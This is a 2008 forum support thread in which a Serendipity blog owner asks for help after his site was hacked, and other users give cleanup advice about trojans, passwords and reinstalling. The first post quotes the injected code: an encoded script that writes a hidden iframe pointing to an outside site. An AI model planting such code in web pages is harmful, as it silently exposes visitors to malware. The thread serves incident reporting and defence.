Page 1 of 1

Site got code injected in.... RSS Feed not working

Posted: Sat Dec 20, 2008 4:10 am
by Andyman77
OK have cleaned up all the files, I believe I have rather.

I had a lot of files with the following code appended to the end of them,

Index.php got hit several times even with file permission going at 644!?

Several other files also got hit.

Code: Select all

# <!-- o --><Script Language='Javascript'>
# <!-- HTML Encryption provided by iWEBTOOL.com -->
# <!--
# document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%61%6C%65%63%68%2E%63%6F%6D%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
# //-->
# </Script><!-- c -->

My RSS feed is now not working... as the code has managed to get into it. You can see it at the URL below.

http://feedvalidator.org/check.cgi?url= ... index.rss2

I would love to know how to clear that one up? as I can't find it in any of the files, and have I looked.

thank you in advance,

Andy

Re: Site got code injected in.... RSS Feed not working

Posted: Sat Dec 20, 2008 3:49 pm
by garvinhicking
Hi!

This is a common hack of a trojan that has your FTP account data. One of your PCs you used FTP to your site most problably was infected.

First you need to scan all client PCs that had access to your site for that trojan/backdor and remove it. only after that you should change all passwords (Mysql, FTP, blog, Mail, ...), and then upload a fresh, unmodified serendipity release version over your blog.

Also delete all files iny our templates_c directory.

Regards,
Garvin

Posted: Sat Jan 03, 2009 6:07 pm
by Andyman77
Hi,

Firstly, Happy New Year and thanks for S9y 1.4.

I had a huge problem with my host, multiple sites got infected with malware, all but 1 of the sites are now clean.

However, my home page is now backup and working and clean.

I was just thinking with S9y 1.4 with it's version checking. Is there a way one can encrypt/compress the main core code of s9y so that there is no way for someone to be able to view the source code ?

Just wondering.

regards,

Andy

Posted: Sat Jan 03, 2009 7:44 pm
by kleinerChemiker
it is possible to "compile" php-code. but s9y is opensource, so even than you could download the uncompiled code and read it. and of course, security by obscurity is a very bad way to enhance security. look at windows, without sourcecode, there is enough maleware that takes advantage of bugs in the code.

Posted: Sat Jan 03, 2009 7:49 pm
by Andyman77
You are correct there. Just an Idea, spawn through the madness of 2 weeks of intense problems with my hosting company and my websites.


:roll:

Posted: Sat Jan 03, 2009 11:03 pm
by garvinhicking
Hi!
Andyman77 wrote:You are correct there. Just an Idea, spawn through the madness of 2 weeks of intense problems with my hosting company and my websites.
You did, like I mentioned, SCAN ALL YOUR PCs? Your recent trouble VERY MUCH emphasizes that one of your PCs might be infected, and that you might go through the same problems again in a few days.

Regards,
Garvin

Posted: Sun Jan 04, 2009 4:29 am
by Andyman77
Hi Garvin,

Yep, I am using Eset, Smart Security, did multiple Deep scans and found nothing. I changed all my passwords. Using Keepass as a generator.

I did find later that there was a 'hidden' FTP account on my hosting server. No idea how that happened.

All appears to be OK now.